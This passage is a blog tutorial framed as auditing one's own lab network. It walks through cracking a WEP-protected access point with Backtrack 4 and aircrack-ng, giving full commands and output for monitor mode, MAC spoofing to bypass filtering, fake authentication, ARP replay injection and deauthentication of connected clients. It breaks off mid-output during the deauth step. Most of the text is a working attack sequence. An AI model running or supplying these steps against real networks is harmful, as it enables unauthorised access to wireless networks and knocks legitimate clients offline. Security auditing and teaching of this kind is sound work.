Cracking WEP with Backtrack 4 and aircrack-ng
I know, there are probably already a zillion websites that show how to crack WEP. So I guess this will be website zillion+1 on learning how to audit your own WEP security. To be honest, the main reason I'm putting this info on this blog is that I just wanted it as a quick reference, or cheat sheet, in case I forget something about particular commands/parameters again :-) And why rely on other websites that may or may not be reachable when you need them :-)
Scenario 1:
WEP encryption, OPEN Authentication, MAC filtering enabled, active client on network
The AP in my test lab uses MAC filtering and is configured to use WEP, using the OPEN Authentication method.
In this scenario, I have 2 clients that are currently connected to the wireless network.
My auditor laptop (an old IBM T22) runs backtrack beta 4, and has a PCMCIA network card (Proxim, Atheros chipset) and a Dlink USB Wireless Adapter (DWL-G122). Both adapters will work just fine, however I get better results with the Proxim PCMCIA card because it has a range extender.
The process of cracking the WEP key for this scenario is:
∙ Put the wireless interface in monitor mode (airmon-ng start wireless_interface)
∙ Find the wireless network (channel, BSSID and ESSID) (airodump-ng wireless_interface_in_monitor_mode)
∙ Find a valid/connected client (MAC address)
∙ Wait until the client is gone and change your MAC address to the valid client MAC (airmon-ng stop wireless_int, ifconfig wireless_int down, macchanger -m XX:XX:XX:XX:XX:XX wireless_int, ifconfig wireless_int up, airmon-ng start wireless_int)
∙ Associate with the AP and inject ARP packets (airodump-ng -c <channel> --ivs -w /tmp/filename wireless_int_in_monitor_mode, aireplay-ng --fakeauth 0 -a <BSSID> -h <client MAC> -e ESSID wireless_int_in_monitor_mode, aireplay-ng -3 -b <BSSID> wireless_int_in_monitor_mode)
∙ If no ARP is found (and injected) in a reasonable amount of time, try to deauthenticate an existing client (aireplay-ng --deauth 0 -a BSSID -c ClientMAC wireless_int_in_monitor_mode)
∙ Save the IVs to a file and crack the key (aircrack-ng -0 -b BSSID /tmp/filename.ivs)
In all cases, in all scenarios, the most important component is verifying that you can associate with an AP. You'll learn some techniques on how to do this in this blog. But let's not jump ahead.
First, list the adapters:
root@bt:~# airmon-ng
Interface       Chipset          Driver
wifi0           Atheros          madwifi-ng
wlan0           Ralink 2573 USB  rt73usb - [phy0]
ath0            Atheros          madwifi-ng VAP (parent: wifi0)
The wifi0 adapter is the Proxim PCMCIA card. wlan0 is the Dlink USB adapter. For this test, we'll use the Proxim card (wifi0). The MAC address of this card is 00:20:A6:4F:A9:41 (you can get the MAC address by running 'ifconfig wifi0').
First, put the card in monitor mode:
root@bt:~# airmon-ng start wifi0
Interface       Chipset          Driver
wifi0           Atheros          madwifi-ng
wlan0           Ralink 2573 USB  rt73usb - [phy0]
ath0            Atheros          madwifi-ng VAP (parent: wifi0)
ath1            Atheros          madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
A new interface called "ath1" has been created. This interface is the one we are going to use in order to find the wireless networks. Launch "airodump-ng ath1" to hop all channels and show the wireless networks that can be found, and the clients (if any) that are currently associated with an Access Point:
root@bt:~# airodump-ng ath1
CH  1 ][ Elapsed: 1 min ][ 2009-02-19 14:05
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID
00:14:BF:89:9C:D3   34      104      0    0  11  54.  WEP  WEP          TestNet
BSSID              STATION            PWR  Rate  Lost  Packets  Probe
00:14:BF:89:9C:D3  00:1C:BF:90:5B:A3   55   0-1     0       12  TestNet
00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   71   0-1    32      441  TestNet
Ok, so we have found a network with ESSID "TestNet", operating at channel 11. Apparently there are 2 clients connected to this AP.
Let's see if we can associate with the Access Point with MAC (BSSID) 00:14:BF:89:9C:D3.
First, run airodump-ng again, but set it to look at channel 11. This is required for the AP association/authentication (via aireplay-ng) to operate at channel 11 as well (because you cannot specify the channel to use when running aireplay-ng):
root@bt:/# airodump-ng --channel 11 ath1
Leave the airodump-ng running for now and run the following aireplay-ng command to perform a 'fake authentication' attempt:
root@bt:~# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:20:A6:4F:A9:41)
14:14:50  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
14:14:50  Sending Authentication Request (Open System) [ACK]
14:14:50  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Authentication failed (code 1)
14:14:53  Sending Authentication Request (Open System) [ACK]
14:14:53  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Authentication failed (code 1)
Ok, authentication failed, so the AP does MAC filtering. We could try to use the MAC address of one of the clients that are already connected (by specifying its MAC address using the -h parameter), but we'll change the MAC address on our interface instead (which will make all future commands shorter).
First, kill the airodump-ng process. Take wifi0 (ath1) out of monitor mode:
root@bt:~# airmon-ng stop ath1
Interface       Chipset          Driver
wifi0           Atheros          madwifi-ng
wlan0           Ralink 2573 USB  rt73usb - [phy0]
ath0            Atheros          madwifi-ng VAP (parent: wifi0)
ath1            Atheros          madwifi-ng VAP (parent: wifi0) (VAP destroyed)
root@bt:~# airmon-ng
Interface       Chipset          Driver
wifi0           Atheros          madwifi-ng
wlan0           Ralink 2573 USB  rt73usb - [phy0]
ath0            Atheros          madwifi-ng VAP (parent: wifi0)
Bring wifi0 down, change the MAC address of wifi0, bring wifi0 up again and then put the interface back in monitor mode:
root@bt:~# ifconfig wifi0 down
root@bt:~# macchanger -m 00:1C:BF:90:5B:A3 wifi0
Current MAC: 00:20:a6:4f:a9:44 (Proxim, Inc.)
Faked MAC:   00:1c:bf:90:5b:a3 (unknown)
root@bt:~# ifconfig wifi0 up
root@bt:~# airmon-ng start wifi0
Interface       Chipset          Driver
wifi0           Atheros          madwifi-ng
wlan0           Ralink 2573 USB  rt73usb - [phy0]
ath0            Atheros          madwifi-ng VAP (parent: wifi0)
ath1            Atheros          madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
root@bt:~# ifconfig ath1
ath1      Link encap:UNSPEC  HWaddr 00-1C-BF-90-5B-A3-D0-03-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:106 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:9448 (9.4 KB)  TX bytes:0 (0.0 B)
Ok, looks good.
Let's see if it makes a difference. Run airodump-ng again (airodump-ng -c 11 ath1) and then try to perform the fake authentication again:
root@bt:/# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:20:19  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
14:20:19  Sending Authentication Request (Open System) [ACK]
14:20:19  Authentication successful
14:20:19  Sending Association Request [ACK]
14:20:19  Association successful :-) (AID: 1)
If you are connecting to an AP that is a bit picky, then you have some options to tweak the aireplay-ng behaviour:
aireplay-ng -1 6000 -o 1 -q 12 -e TestNet -a 00:14:BF:89:9C:D3 ath1
-1 6000 = reauthenticate every 6000 seconds
-o 1 = only send one set of packets at a time
-q 12 = send keepalive packets every 12 seconds (sometimes, it works better without this last parameter)
From this point forward, you should be able to associate with the AP. If not, there's no use in continuing with the process.
Ok, now let's try to crack the key. First, stop the existing airodump process and run airodump-ng with the option to save the IVs to a file (parameter -i or --ivs):
root@bt:~# airodump-ng -c 11 -w /tmp/TestNetAudit1 -i ath1
CH 11 ][ Elapsed: 12 s ][ 2009-02-19 14:24
BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID
00:14:BF:89:9C:D3   34 100      135      0    0  11  54.  WEP  WEP    OPN   TestNet
BSSID              STATION            PWR  Rate  Lost  Packets  Probe
00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   43   0-1    10       84  TestNet
The number of #Data packets is most likely still very low and does not go up as fast as we want it to. So we need to grab an ARP packet and inject it.
First, launch aireplay-ng in injection mode:
root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:26:55  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Saving ARP requests in replay_arp-0219-142655.cap
You should also start airodump-ng to capture replies.
Read 243 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
(Leave this running and wait until an ARP request is seen. The tool will then automatically attempt to inject the ARP packets, thus increasing the number of data packets (and IVs) on the network.) Some APs require you to be associated (or will disassociate you after a while). It might take a couple of minutes before an ARP is seen. If you don't have a lot of time, it might help to try to associate yourself again:
aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
If that does not generate the required ARP packet(s), which should set off the ARP injection, then try to deauthenticate the existing clients (which may not work very well if the AP has MAC filtering enabled. If you have a second client MAC address, you can set your own MAC address to one of the clients and try to deauth the other client…)
Keep the aireplay-ng and airodump-ng running and run the deauth attack.
root@bt:/# aireplay-ng --deauth 0 -a 00:14:BF:89:9C:D3 ath1
14:38:15  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c).
14:38:15  Sending